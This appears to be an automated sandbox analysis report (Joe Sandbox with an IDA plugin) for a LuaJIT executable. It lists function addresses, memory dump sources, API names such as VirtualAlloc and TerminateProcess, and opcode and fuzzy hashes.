                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$FormatLibraryLoadMessage
                                                                                                                                                                                                                              • String ID: cannot load module '%s': %s
                                                                                                                                                                                                                              • API String ID: 3853237079-2554058836
                                                                                                                                                                                                                              • Opcode ID: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                                                                                                                                                                                              • Instruction ID: 6b9004db4d5334aabb91806fd0ae828f1db29e3107eba924d31f8570b8e0bf24
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BF0FB66938A8582D720EB16F44121AB770FBC5794F901135EA9D03B28CE7CD994CE50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77242D4E4 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1452418845-0
                                                                                                                                                                                                                              • Opcode ID: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                                                                                                                                                                                              • Instruction ID: ca4efb590b88f9d5e89b191eb108da94b4bb287e8d3833f90cf0f56bba3452d8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52313A23E3924285FF64BB6794213B9A2D19F41B84FD44439E97D4B6D7CEECAC44CA20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723A8C90 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$QueryVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3696288210-0
                                                                                                                                                                                                                              • Opcode ID: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                                                                                                                                                                                              • Instruction ID: a239fdfe2b795f28bdc017b347d4742999c7ad6acdf03f46ceea9a019a8aeccc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0521B32363DA4581EA609B19E440229B7B0FF997D4F50067AF6AD42BB4DF7CD540CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77239FD90 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 370COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 333 7ff77239fd90-7ff77239fdb6 334 7ff77239fdd0-7ff77239fde2 333->334 335 7ff77239fdb8-7ff77239fdc8 333->335 336 7ff77239fde4-7ff77239fdf6 334->336 337 7ff77239fe3c-7ff77239fe4f 334->337 335->334 336->337 340 7ff77239fdf8-7ff77239fdfd 336->340 338 7ff77239fe55-7ff77239fe68 337->338 339 7ff7723a004b-7ff7723a0067 337->339 338->339 341 7ff77239fe6e-7ff77239fe73 338->341 342 7ff7723a008a-7ff7723a008f 339->342 343 7ff7723a0069-7ff7723a0085 339->343 344 7ff77239feb0-7ff77239fee0 call 7ff77239f4a0 340->344 345 7ff77239fe03-7ff77239fe15 340->345 341->344 346 7ff77239fe75-7ff77239fe88 341->346 349 7ff7723a0091-7ff7723a00a0 342->349 350 7ff7723a00fb 342->350 348 7ff7723a010b-7ff7723a010f 343->348 359 7ff77239fee6-7ff77239ff0f call 7ff77239f4a0 344->359 360 7ff77239ff78-7ff7723a0000 call 7ff77239f180 * 3 344->360 345->344 351 7ff77239fe1b-7ff77239fe3a 345->351 346->344 354 7ff77239fe8a-7ff77239feaa 346->354 353 7ff7723a0114-7ff7723a0131 348->353 349->350 356 7ff7723a00a2-7ff7723a00be 349->356 352 7ff7723a0103-7ff7723a0107 350->352 351->337 351->344 352->348 357 7ff7723a0154-7ff7723a0159 353->357 358 7ff7723a0133-7ff7723a014f 353->358 354->339 354->344 356->350 361 7ff7723a00c0-7ff7723a00f9 356->361 364 7ff7723a01c5 357->364 365 7ff7723a015b-7ff7723a016a 357->365 363 7ff7723a01d5-7ff7723a0201 358->363 359->360 375 7ff77239ff11-7ff77239ff24 359->375 392 7ff7723a0002-7ff7723a002d 360->392 393 7ff7723a0035-7ff7723a0041 360->393 361->352 371 7ff7723a022f-7ff7723a0238 363->371 372 7ff7723a0203-7ff7723a0213 363->372 369 7ff7723a01cd-7ff7723a01d1 364->369 365->364 368 7ff7723a016c-7ff7723a0188 365->368 368->364 374 7ff7723a018a-7ff7723a01c3 368->374 369->363 377 7ff7723a023a-7ff7723a0247 call 7ff772390950 371->377 378 7ff7723a024c-7ff7723a02a0 call 7ff77239f250 call 7ff77239f2a0 371->378 372->353 376 7ff7723a0219-7ff7723a0229 372->376 374->369 382 7ff77239ff26-7ff77239ff39 375->382 383 7ff77239ff3b-7ff77239ff47 375->383 376->353 376->371 377->378 396 7ff7723a03b6-7ff7723a03c3 call 7ff77239f2f0 378->396 397 7ff7723a02a6-7ff7723a02b5 378->397 382->383 386 7ff77239ff4f-7ff77239ff73 call 7ff772390a70 382->386 383->386 394 7ff7723a0467-7ff7723a046e 386->394 392->393 393->394 402 7ff7723a03c8-7ff7723a03d3 396->402 398 7ff7723a02b7-7ff7723a02f8 call 7ff7723be9c0 397->398 399 7ff7723a02fd-7ff7723a0302 397->399 414 7ff7723a03b1 398->414 403 7ff7723a0304-7ff7723a0313 399->403 404 7ff7723a037d-7ff7723a0381 399->404 408 7ff7723a03e0-7ff7723a03e8 402->408 409 7ff7723a03db call 7ff77239f120 402->409 403->404 410 7ff7723a0315-7ff7723a0331 403->410 405 7ff7723a0383-7ff7723a0394 call 7ff7723b1a40 404->405 406 7ff7723a0396-7ff7723a03ac call 7ff7723d2fe0 404->406 405->414 406->414 408->334 413 7ff7723a03ee-7ff7723a040e 408->413 409->408 410->404 415 7ff7723a0333-7ff7723a037b call 7ff7723be9c0 410->415 417 7ff7723a0410-7ff7723a0415 413->417 418 7ff7723a0465 413->418 415->414 421 7ff7723a0458-7ff7723a0460 call 7ff772398660 417->421 422 7ff7723a0417-7ff7723a0454 417->422 418->394 421->418 422->421
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $
                                                                                                                                                                                                                              • API String ID: 0-227171996
                                                                                                                                                                                                                              • Opcode ID: 9843a88858d80629a5392dfe685009a7de1f426911982b70ac98bb5915318121
                                                                                                                                                                                                                              • Instruction ID: cfcd62b043d6c6a814fd058bbf765e9ae6deb7db3ce1378ebbdf9cefed21fd04
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9843a88858d80629a5392dfe685009a7de1f426911982b70ac98bb5915318121
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D702F327628B8585DB609B2AD48036EB3A0F789BA4F504735EABD877E5CE7CD441CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723930A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID: \
                                                                                                                                                                                                                              • API String ID: 1452528299-2967466578
                                                                                                                                                                                                                              • Opcode ID: dc7aa63d98f7a6b8676f16d7f75754d7e493f1b49019153a7c34ee2b34105215
                                                                                                                                                                                                                              • Instruction ID: 9975d51c1f120370a8f9aa348990b085cbed74480fccce4723410130ede73357
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc7aa63d98f7a6b8676f16d7f75754d7e493f1b49019153a7c34ee2b34105215
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6251CE73638B8586DA50DB19E481229B7B0F789BA4F600275EAED877A4CF7CD441CF14
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77244AD1C Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                                                                                                                                                                                              • Instruction ID: 4155398b549b85af994cfce0586b69b273ff0bc4181df81a99a5fa50558b0437
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7E04862B3434542EB1477735C953795263AF45781F849439C83E02356CDBDEC48CF20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723A8BB0 Relevance: 3.8, APIs: 3, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$AllocVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1225938287-0
                                                                                                                                                                                                                              • Opcode ID: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                                                                                                                                                                                              • Instruction ID: f1cd2522fa74c9b2a7cc463f3a88c5a48e7209396072d6506c7ba93ae9bbc589
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9F0F972539A8182D660AB15E44471AA770F7887A4F401328E6BE02BE8CF7CC554CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723A8C20 Relevance: 3.8, APIs: 3, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$AllocVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1225938287-0
                                                                                                                                                                                                                              • Opcode ID: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                                                                                                                                                                                              • Instruction ID: 76992446d633fb03d043046630c15f3d42fc51664a922280a01feace585b9f0b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12F0F972539A8186D660AB15E44471AA770F7887A4F401338E6BE12BE8CF7CC554CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77239B7A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strrchr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3418686817-3916222277
                                                                                                                                                                                                                              • Opcode ID: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                                                                                                                                                                                              • Instruction ID: ededf3668e418d019e6b11f2fdca3c03372e78b047ac91649f8b285301aaaf5d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E051BA376296858AD750DB19E08032AB7B1F7CAB94F601125FBDE87B68CB79D441CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772466500 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Info
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1807457897-3916222277
                                                                                                                                                                                                                              • Opcode ID: d6049e12829b25a40106f2a2772facc37ef588d00b3e3406152c56e8e443654b
                                                                                                                                                                                                                              • Instruction ID: 719fbe09be6bc67b84499f96b7f3d869d5a2bf11961f119007cc46da6d62f4c6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6049e12829b25a40106f2a2772facc37ef588d00b3e3406152c56e8e443654b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D051F473A3C2C196E7209F25E0443ADBBB0F744B48F944139DA9D47A89CBACD805CF64
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772385D60 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _wcsupr_s
                                                                                                                                                                                                                              • String ID: arg
                                                                                                                                                                                                                              • API String ID: 600324503-2022414218
                                                                                                                                                                                                                              • Opcode ID: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                                                                                                                                                                                              • Instruction ID: 014ccd3116b7559f12405cb674220f78de3f1ca3d1ae95a2749ccaa4230fbde0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA31F33363864186D620EB15E44126AB3A1FBC9794F904276FA9D877A9DF7CD901CF20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772459550 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: try_get_function
                                                                                                                                                                                                                              • String ID: AppPolicyGetProcessTerminationMethod
                                                                                                                                                                                                                              • API String ID: 2742660187-2031265017
                                                                                                                                                                                                                              • Opcode ID: 4833c0902515f3c114d76ba3d1c7fa11a93093573dd0661da56e0bda8c04332a
                                                                                                                                                                                                                              • Instruction ID: e34da1209c60a4dbc8d890b4f27389ada8de78f932b29cd5a5f70ba5f0f19996
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4833c0902515f3c114d76ba3d1c7fa11a93093573dd0661da56e0bda8c04332a
